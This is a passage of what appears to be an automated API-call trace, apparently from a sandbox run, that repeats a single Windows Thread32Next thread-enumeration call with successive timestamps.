(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.635] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.805] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.815] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.824] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.825] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.960] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.964] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.964] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.965] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.966] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.967] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.967] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.968] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.970] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.972] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.973] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.974] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.975] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.976] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.978] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.978] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.979] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.980] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.982] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.983] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.364] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.594] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.594] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.773] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.774] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.775] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.776] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.777] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.779] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.780] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.783] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.785] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.786] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.805] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.015] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.017] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.018] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.019] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.020] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.020] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.022] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.022] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.023] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.023] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.025] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.225] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.226] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.229] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.230] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.231] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.231] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.232] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.233] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.234] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.235] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.236] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.237] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.237] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.238] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.239] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.240] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.240] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.241] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.242] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.243] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.244] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.245] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.246] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.247] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.248] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.249] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.249] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.250] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.251] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.252] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.252] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.253] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.254] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.255] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.256] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.257] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.259] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.260] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.261] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.467] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 